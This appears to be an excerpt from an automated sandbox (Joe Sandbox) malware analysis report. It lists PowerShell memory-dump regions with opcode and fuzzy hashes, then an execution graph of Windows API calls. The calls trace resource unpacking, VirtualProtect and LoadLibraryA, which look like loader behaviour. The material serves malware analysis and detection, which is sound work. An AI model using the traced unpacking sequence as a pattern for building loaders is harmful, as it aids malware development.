                                                                                                                              • Source File: 0000000B.00000002.2301870550.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_b30000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: e6ce6d8aa3137a561cad6974c37537716e61e500acc7ae2217d399c3ffd18580
                                                                                                                              • Instruction ID: 52184bc6cee921c730b4c98b03dc7777fef58afa51ddc8b8dc1f4ee29a1abdd4
                                                                                                                              • Opcode Fuzzy Hash: e6ce6d8aa3137a561cad6974c37537716e61e500acc7ae2217d399c3ffd18580
                                                                                                                              • Instruction Fuzzy Hash: 64F0A771700714DFC7109A69D844A6F77E9EF88771B10052DE109D3740DF31AD4287A0
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2294876082.000000000088D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0088D000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_88d000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 663fb3bb905488f85dc33cf6a0e9b6fc00874d50410462e04a287a83088ce865
                                                                                                                              • Instruction ID: b5f0336e1d3d5dc58c7e255a3ef4a571a60b181b3890919decb5a33560b68579
                                                                                                                              • Opcode Fuzzy Hash: 663fb3bb905488f85dc33cf6a0e9b6fc00874d50410462e04a287a83088ce865
                                                                                                                              • Instruction Fuzzy Hash: 76F0F975100A40AFD725DF06CD85D23BBF9EB85764B198589E84A8B362C671FC42CBA0
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2301870550.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_b30000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 2dd7e6d7a97733080ee51cb7118b191729703b46f1d2d0b07c76ea2eb3601cb2
                                                                                                                              • Instruction ID: c078c9eec13fbadb4f4ed0d41abd0144e5841231101f1a0c99bb4808b5a5bd5c
                                                                                                                              • Opcode Fuzzy Hash: 2dd7e6d7a97733080ee51cb7118b191729703b46f1d2d0b07c76ea2eb3601cb2
                                                                                                                              • Instruction Fuzzy Hash: 49F027B16045049BE300BB69C0193AFB796EBC0714F20812AE5099B3C5DE362901CBD1
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2301870550.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_b30000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: c3ae86b9a28ce085d3bf36ff1c4f07a2fa31ca07264333f2bb982f69c8e0bc8d
                                                                                                                              • Instruction ID: ad3554aa7e1871f80837f0930cae77dda61a87d411261bc863576dd66aa922ed
                                                                                                                              • Opcode Fuzzy Hash: c3ae86b9a28ce085d3bf36ff1c4f07a2fa31ca07264333f2bb982f69c8e0bc8d
                                                                                                                              • Instruction Fuzzy Hash: 2BF0A0B93005088FDB10DB7CD850AAAB7E6FBCCB50B294198E509CB320DF20DC018B91
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2301870550.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_b30000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: f59856e20572b0b024d54d6c402df1f818d5ad64041f4b3aab99c18199772406
                                                                                                                              • Instruction ID: 7bcbcedbeb4a8da0978590b1c9389abc8f202ca0b59e9d95388ff5e3adb66b13
                                                                                                                              • Opcode Fuzzy Hash: f59856e20572b0b024d54d6c402df1f818d5ad64041f4b3aab99c18199772406
                                                                                                                              • Instruction Fuzzy Hash: 39E0E5793006108F86149B1DE498C26BBFAEFDEB6572900A9E649CB721DA61EC01CB90
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2301870550.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_b30000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 308170706318cd020bedd96c83c1b43161c4c6924779d7b35bdac9ac1881e41c
                                                                                                                              • Instruction ID: bf38ad84bc038394628fbd8773f5cfb006e22d31c4efa8ea15f47a4945ab4850
                                                                                                                              • Opcode Fuzzy Hash: 308170706318cd020bedd96c83c1b43161c4c6924779d7b35bdac9ac1881e41c
                                                                                                                              • Instruction Fuzzy Hash: 1DF06D719007049BD360EBB9E89D3EA7BE9FB45721F00446AE10ED7380DF7A6D818B90
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2301870550.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_b30000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: ef15e1e6d906337dd6490240a05d3206d863790e4e27bf28c366a4e2274e9e89
                                                                                                                              • Instruction ID: a884edef0565f1aa733d644ca62a1c783b604a58c19f259d05a1f78099c12f25
                                                                                                                              • Opcode Fuzzy Hash: ef15e1e6d906337dd6490240a05d3206d863790e4e27bf28c366a4e2274e9e89
                                                                                                                              • Instruction Fuzzy Hash: EFE09236704A1457DB083679A81E3ED7B9AEBC4721F04002BEA0687241DF691E0243D9
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2301870550.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_b30000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 0c639aa11f29337745ff7235b2f1256e095a245020137a19f603b38b408bdd64
                                                                                                                              • Instruction ID: 5659cf794804c94fdfda54d8dc8d7c446049d0003091e64dcf18b7e34a04546b
                                                                                                                              • Opcode Fuzzy Hash: 0c639aa11f29337745ff7235b2f1256e095a245020137a19f603b38b408bdd64
                                                                                                                              • Instruction Fuzzy Hash: 9DD0126674631527455561BA28016FBB6CFC9C46A0F6511B6F905C3742EC51DC0103F2
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2301870550.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_b30000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 6ab94c520e4fc63519efd89b900dab6eead43300d686ffd687bbbb29737dabaf
                                                                                                                              • Instruction ID: 61d55712eee3ce31a4c1a4bc41c61e45c929aa5a30d297d2829a5a6d2d769b73
                                                                                                                              • Opcode Fuzzy Hash: 6ab94c520e4fc63519efd89b900dab6eead43300d686ffd687bbbb29737dabaf
                                                                                                                              • Instruction Fuzzy Hash: 2DF06D709007049BD360DB78D89D39A7BE9FB44310F004469E10ED7380DB7969808B90
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2301870550.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_b30000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 34c02ffca4d94407c25d11d27e3d3f59876e5876d5c53bbd70d86fd60102d56b
                                                                                                                              • Instruction ID: 9066a02e8b698706e781917d64ea828e1d6800087b7d6e791eb192a3925e476a
                                                                                                                              • Opcode Fuzzy Hash: 34c02ffca4d94407c25d11d27e3d3f59876e5876d5c53bbd70d86fd60102d56b
                                                                                                                              • Instruction Fuzzy Hash: C6E0ED78D04249AFD750EFB9C88159AFFF5AF45300B2086AED888E7601E6319602DBE1
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2301870550.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_b30000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 7846afc6ab36b1efbd8c1c20430d5f259be6ec47cac1598bbf55f1dd3f7e9801
                                                                                                                              • Instruction ID: 75d3fb3ca39aa6dfedd43a3c17093e3612ded59866c7620ac317c3a05a232699
                                                                                                                              • Opcode Fuzzy Hash: 7846afc6ab36b1efbd8c1c20430d5f259be6ec47cac1598bbf55f1dd3f7e9801
                                                                                                                              • Instruction Fuzzy Hash: E9E04F35704A1497DB093779A81D3AE7B9AFBC4725F04002AE60687341DF695E1283D9
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2301870550.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_b30000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 7882bb0d2eeb50203f85a4f20f35183b74806ddacc379e16382cdb06e359fbc1
                                                                                                                              • Instruction ID: 8571fa22b676078ebca44716ba329c15383065e0b84b4bb033892bdc376fb38f
                                                                                                                              • Opcode Fuzzy Hash: 7882bb0d2eeb50203f85a4f20f35183b74806ddacc379e16382cdb06e359fbc1
                                                                                                                              • Instruction Fuzzy Hash: 5AD05E26714165130F29912E78114EBFBEBCAD667063882BAF985CB785ED629C0243E2
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2301870550.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_b30000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 9c6e964d81fe1c7101ffb6f6ecf2659a9a0940229ecdd17d648bebc15dfa4368
                                                                                                                              • Instruction ID: a84e90537d1039b9411df6f5687e8c5c6e4a1fc51a55f5faeaf9c3e8436f41ab
                                                                                                                              • Opcode Fuzzy Hash: 9c6e964d81fe1c7101ffb6f6ecf2659a9a0940229ecdd17d648bebc15dfa4368
                                                                                                                              • Instruction Fuzzy Hash: 24D05E567023262B055420BA28017BBB1CFCAC46A0F6612B6FA09C3382EC91DC0103F2
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2301870550.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_b30000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                                                                              • Instruction ID: d03a5e35b51babb21acd6ac93786046176e039ba3acab4a7ae08ea84c5224771
                                                                                                                              • Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                                                                              • Instruction Fuzzy Hash: EEE08631B10014978B089959E4504EDFBAADBCC321F24807AD90AA7340DA32591586E1
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2301870550.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_b30000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 7b21e7b048a1eea8f7466b00c161f47bf823e70315db9a149b14a01d187cce55
                                                                                                                              • Instruction ID: 5aaa9947598f71dfe10d515598a56af62dfdb4baeb2863a212215af193ec54dc
                                                                                                                              • Opcode Fuzzy Hash: 7b21e7b048a1eea8f7466b00c161f47bf823e70315db9a149b14a01d187cce55
                                                                                                                              • Instruction Fuzzy Hash: 22E01235808249DBCB09AF74E45B6FDBF78FB00311F50019AE9075A5A1DE341A46CBC1
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2301870550.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_b30000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 45eaf29cd280becedb6ad3dff1947024513b19998750eeffce5c8f29a3742513
                                                                                                                              • Instruction ID: 9afeb1b8533f52a510c8f13e3dec70013ec4cb03ae1ca7c9858d8f2a40d4ae0e
                                                                                                                              • Opcode Fuzzy Hash: 45eaf29cd280becedb6ad3dff1947024513b19998750eeffce5c8f29a3742513
                                                                                                                              • Instruction Fuzzy Hash: BBE08635D082098FC714DB64E4875BE7FF4A704311F004155E90597350DE305D81CBC1
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2301870550.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_b30000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                                              • Instruction ID: e850b62d784a8e38cddcab9de3096f8e89bf2c2eee38e9101dd3c602797f1d20
                                                                                                                              • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                                              • Instruction Fuzzy Hash: 58D067B0D0420A9F8780EFADC94156EFBF4EB58200F6085BA8919E7301E7329A12CBD1
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2301870550.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_b30000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 97a6dbaf511570b7e749caf98ab427220f42eb4667a65c8f07996c41dbad5ae3
                                                                                                                              • Instruction ID: f894cbb0dd0cd9045df937d0add193560a6da1d8bd1e49e49aee694c417683e7
                                                                                                                              • Opcode Fuzzy Hash: 97a6dbaf511570b7e749caf98ab427220f42eb4667a65c8f07996c41dbad5ae3
                                                                                                                              • Instruction Fuzzy Hash: D9D06735804609CBCB08ABA4E85B6BDBB78FA14311F5041A9E907561A0EE751A5ACAC5
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2301870550.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_b30000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: ba4e1d21037098e6a0340bca876742fb5ba0e4855aaf4ad1df3a484cf0881ad8
                                                                                                                              • Instruction ID: 851b703f110bcfc1445eb255cc2e0f6c369ea520b33bdf210a9d14160cb90786
                                                                                                                              • Opcode Fuzzy Hash: ba4e1d21037098e6a0340bca876742fb5ba0e4855aaf4ad1df3a484cf0881ad8
                                                                                                                              • Instruction Fuzzy Hash: 71D01734E0820A8BCB18EFA4E847A6EBBF8AB44301F104169ED0997350EA305D01CBC1
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2301870550.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_b30000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: b1c81e23c6c64df3b1e42af3e58dc00c76bd761b0bea0ce8a2e9e19907e234cb
                                                                                                                              • Instruction ID: 84b1e0288668dd881255779ac6e8b0e92b52f0ed8c83f462ed5ccbdafbef46fd
                                                                                                                              • Opcode Fuzzy Hash: b1c81e23c6c64df3b1e42af3e58dc00c76bd761b0bea0ce8a2e9e19907e234cb
                                                                                                                              • Instruction Fuzzy Hash: 6FD0123404D382CFC7164FB495144603F31FF8225632515CFE4098A6A3CA36C959DB11
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2301870550.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_b30000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: a23a699396cbcd8f07e19a3b28f6d29bc31cd5c021093c771d8ac39ee6b3b55f
                                                                                                                              • Instruction ID: c1857f0c618fd73bd9ffd26864e1a3383f6105432792c194d1986e7b33869803
                                                                                                                              • Opcode Fuzzy Hash: a23a699396cbcd8f07e19a3b28f6d29bc31cd5c021093c771d8ac39ee6b3b55f
                                                                                                                              • Instruction Fuzzy Hash: 9FC08C3140A2808FEF024730CCA20147F70EF4320530601D3CE03C7123CE248822CB42
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2301870550.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_b30000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 347fc31c8b22d97a28ffa2699a9f7351c4aca13ae926ac0ead0c733c02d9d846
                                                                                                                              • Instruction ID: b7551b5f9965b3158033c6e68c4ed2a3edceba76ee07e45209069e06c78af61a
                                                                                                                              • Opcode Fuzzy Hash: 347fc31c8b22d97a28ffa2699a9f7351c4aca13ae926ac0ead0c733c02d9d846
                                                                                                                              • Instruction Fuzzy Hash: F1B0122939130006EA040E3315462E627D59AD03D2B649072F801C4451CA3DC0062140
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2301870550.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_b30000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 27d998be5e608b099082256e01da69171b4bea833fd794b3b054a22db456be6b
                                                                                                                              • Instruction ID: b510bcf3859dc7d61e508c3efe51cba1334aae96a9fd000fa1f0c2cd722fa120
                                                                                                                              • Opcode Fuzzy Hash: 27d998be5e608b099082256e01da69171b4bea833fd794b3b054a22db456be6b
                                                                                                                              • Instruction Fuzzy Hash: F9B0923404470ACFC2486FB5A404814736DAF4465638004A8E81E0A7928E37E885CA44
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2426745007.00000000070C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070C0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_70c0000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: Jk$Jk$Jk$Jk$Jk$rk$rk
                                                                                                                              • API String ID: 0-366263723
                                                                                                                              • Opcode ID: 6dda0c2c8c79aa85f458ca553a1cc3d20ef05462f2c7619c00ef4c3895ef385e
                                                                                                                              • Instruction ID: 9d50fb576add46ed2a49c8760c70b6cab027e9a26982147fa23de0b586d37f62
                                                                                                                              • Opcode Fuzzy Hash: 6dda0c2c8c79aa85f458ca553a1cc3d20ef05462f2c7619c00ef4c3895ef385e
                                                                                                                              • Instruction Fuzzy Hash: DED116F1B0420ADFD725DB6894106AEBBF6AFC6210F2882AFD515CB257DB31C841C7A1

                                                                                                                              Execution Graph

                                                                                                                              Execution Coverage:5.2%
                                                                                                                              Dynamic/Decrypted Code Coverage:4.2%
                                                                                                                              Signature Coverage:0%
                                                                                                                              Total number of Nodes:1291
                                                                                                                              Total number of Limit Nodes:53
                                                                                                                              execution_graph 18265 36cd3eff 18268 36cd3590 18265->18268 18269 36cd359b 18268->18269 18272 36cd54c8 18269->18272 18270 36cd3f0c 18273 36cd5527 GetCurrentThreadId 18272->18273 18275 36cd556d 18273->18275 18275->18270 18224 336b9308 18225 336b9348 CloseHandle 18224->18225 18227 336b9379 18225->18227 18228 36cd55c8 18229 36cd560c 18228->18229 18230 36cd5616 EnumThreadWindows 18228->18230 18229->18230 18231 36cd5648 18230->18231 18232 36cd38e8 DuplicateHandle 18233 36cd397e 18232->18233 18276 336b0890 18277 336b08b1 18276->18277 18278 336b097a 18277->18278 18281 336b1838 18277->18281 18284 336b3bf3 18277->18284 18287 336b9080 18281->18287 18286 336b9080 VirtualProtect 18284->18286 18285 336b3c12 18286->18285 18288 336b9093 18287->18288 18291 336b9130 18288->18291 18292 336b9178 VirtualProtect 18291->18292 18294 336b1851 18292->18294 18234 36cd36a0 18235 36cd36e6 GetCurrentProcess 18234->18235 18237 36cd3738 GetCurrentThread 18235->18237 18238 36cd3731 18235->18238 18239 36cd376e 18237->18239 18240 36cd3775 GetCurrentProcess 18237->18240 18238->18237 18239->18240 18243 36cd37ab 18240->18243 18241 36cd37d3 GetCurrentThreadId 18242 36cd3804 18241->18242 18243->18241 18295 40cbdd 18296 40cbe9 __close 18295->18296 18330 40d534 HeapCreate 18296->18330 18299 40cc46 18332 41087e GetModuleHandleW 18299->18332 18303 40cc57 __RTC_Initialize 18366 411a15 18303->18366 18304 40cbb4 _fast_error_exit 63 API calls 18304->18303 18306 40cc66 18307 40cc72 GetCommandLineA 18306->18307 18506 40e79a 18306->18506 18381 412892 18307->18381 18314 40cc97 18420 41255f 18314->18420 18315 40e79a __amsg_exit 63 API calls 18315->18314 18318 40cca8 18435 40e859 18318->18435 18319 40e79a __amsg_exit 63 API calls 18319->18318 18321 40ccb0 18322 40ccbb 18321->18322 18323 40e79a __amsg_exit 63 API calls 18321->18323 18441 4019f0 OleInitialize 18322->18441 18323->18322 18325 40ccd8 18326 40ccea 18325->18326 18495 40ea0a 18325->18495 18513 40ea36 18326->18513 18329 40ccef __close 18331 40cc3a 18330->18331 18331->18299 18498 40cbb4 18331->18498 18333 410892 18332->18333 18334 410899 18332->18334 18516 40e76a 18333->18516 18336 410a01 18334->18336 18337 4108a3 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 18334->18337 18575 410598 18336->18575 18339 4108ec TlsAlloc 18337->18339 18342 40cc4c 18339->18342 18343 41093a TlsSetValue 18339->18343 18342->18303 18342->18304 18343->18342 18344 41094b 18343->18344 18520 40ea54 18344->18520 18349 41046e __encode_pointer 6 API calls 18350 41096b 18349->18350 18351 41046e __encode_pointer 6 API calls 18350->18351 18352 41097b 18351->18352 18353 41046e __encode_pointer 6 API calls 18352->18353 18354 41098b 18353->18354 18537 40d564 18354->18537 18361 4104e9 __decode_pointer 6 API calls 18362 4109df 18361->18362 18362->18336 18363 4109e6 18362->18363 18557 4105d5 18363->18557 18365 4109ee GetCurrentThreadId 18365->18342 18881 40e1d8 18366->18881 18368 411a21 GetStartupInfoA 18369 411cba __calloc_crt 63 API calls 18368->18369 18375 411a42 18369->18375 18370 411c60 __close 18370->18306 18371 411bdd GetStdHandle 18376 411ba7 18371->18376 18372 411c42 SetHandleCount 18372->18370 18373 411cba __calloc_crt 63 API calls 18373->18375 18374 411bef GetFileType 18374->18376 18375->18370 18375->18373 18375->18376 18378 411b2a 18375->18378 18376->18370 18376->18371 18376->18372 18376->18374 18379 41389c __alloc_osfhnd InitializeCriticalSectionAndSpinCount 18376->18379 18377 411b53 GetFileType 18377->18378 18378->18370 18378->18376 18378->18377 18380 41389c __alloc_osfhnd InitializeCriticalSectionAndSpinCount 18378->18380 18379->18376 18380->18378 18382 4128b0 GetEnvironmentStringsW 18381->18382 18383 4128cf 18381->18383 18384 4128c4 GetLastError 18382->18384 18385 4128b8 18382->18385 18383->18385 18386 412968 18383->18386 18384->18383 18387 4128eb GetEnvironmentStringsW 18385->18387 18388 4128fa WideCharToMultiByte 18385->18388 18389 412971 GetEnvironmentStrings 18386->18389 18390 40cc82 18386->18390 18387->18388 18387->18390 18394 41295d FreeEnvironmentStringsW 18388->18394 18395 41292e 18388->18395 18389->18390 18391 412981 18389->18391 18407 4127d7 18390->18407 18396 411c75 __malloc_crt 63 API calls 18391->18396 18394->18390 18397 411c75 __malloc_crt 63 API calls 18395->18397 18398 41299b 18396->18398 18399 412934 18397->18399 18400 4129a2 FreeEnvironmentStringsA 18398->18400 18401 4129ae ___crtGetEnvironmentStringsA 18398->18401 18399->18394 18402 41293c WideCharToMultiByte 18399->18402 18400->18390 18405 4129b8 FreeEnvironmentStringsA 18401->18405 18403 412956 18402->18403 18404 41294e 18402->18404 18403->18394 18406 40b6b5 __crtGetStringTypeA_stat 63 API calls 18404->18406 18405->18390 18406->18403 18408 4127f1 GetModuleFileNameA 18407->18408 18409 4127ec 18407->18409 18411 412818 18408->18411 18888 41446b 18409->18888 18882 41263d 18411->18882 18414 40cc8c 18414->18314 18414->18315 18415 412854 18416 411c75 __malloc_crt 63 API calls 18415->18416 18417 41285a 18416->18417 18417->18414 18418 41263d _parse_cmdline 73 API calls 18417->18418 18419 412874 18418->18419 18419->18414 18421 412568 18420->18421 18423 41256d _strlen 18420->18423 18422 41446b ___initmbctable 107 API calls 18421->18422 18422->18423 18424 411cba __calloc_crt 63 API calls 18423->18424 18427 40cc9d 18423->18427 18430 4125a2 _strlen 18424->18430 18425 412600 18426 40b6b5 __crtGetStringTypeA_stat 63 API calls 18425->18426 18426->18427 18427->18318 18427->18319 18428 411cba __calloc_crt 63 API calls 18428->18430 18429 412626 18431 40b6b5 __crtGetStringTypeA_stat 63 API calls 18429->18431 18430->18425 18430->18427 18430->18428 18430->18429 18432 40ef42 _strcpy_s 63 API calls 18430->18432 18433 4125e7 18430->18433 18431->18427 18432->18430 18433->18430 18434 40e61c __invoke_watson 10 API calls 18433->18434 18434->18433 18436 40e867 __IsNonwritableInCurrentImage 18435->18436 19299 413586 18436->19299 18438 40e885 __initterm_e 18440 40e8a4 __IsNonwritableInCurrentImage __initterm 18438->18440 19303 40d2bd 18438->19303 18440->18321 18442 401ab9 18441->18442 19403 40b99e 18442->19403 18444 401abf 18445 401acd GetCurrentProcessId CreateToolhelp32Snapshot Module32First 18444->18445 18471 402467 18444->18471 18446 401dc3 CloseHandle GetModuleHandleA 18445->18446 18453 401c55 18445->18453 19416 401650 18446->19416 18448 401e8b FindResourceA LoadResource LockResource SizeofResource 18449 40b84d _malloc 63 API calls 18448->18449 18450 401ebf 18449->18450 19418 40af66 18450->19418 18452 401c9c CloseHandle 18452->18325 18453->18452 18458 401cf9 Module32Next 18453->18458 18454 401ecb _memset 18455 401efc SizeofResource 18454->18455 18456 401f1c 18455->18456 18457 401f5f 18455->18457 18456->18457 19456 401560 18456->19456 18459 401f92 _memset 18457->18459 18461 401560 __VEC_memcpy 18457->18461 18458->18446 18469 401d0f 18458->18469 18462 401fa2 FreeResource 18459->18462 18461->18459 18463 40b84d _malloc 63 API calls 18462->18463 18464 401fbb SizeofResource 18463->18464 18465 401fe5 _memset 18464->18465 18466 4020aa LoadLibraryA 18465->18466 18467 401650 18466->18467 18468 40216c 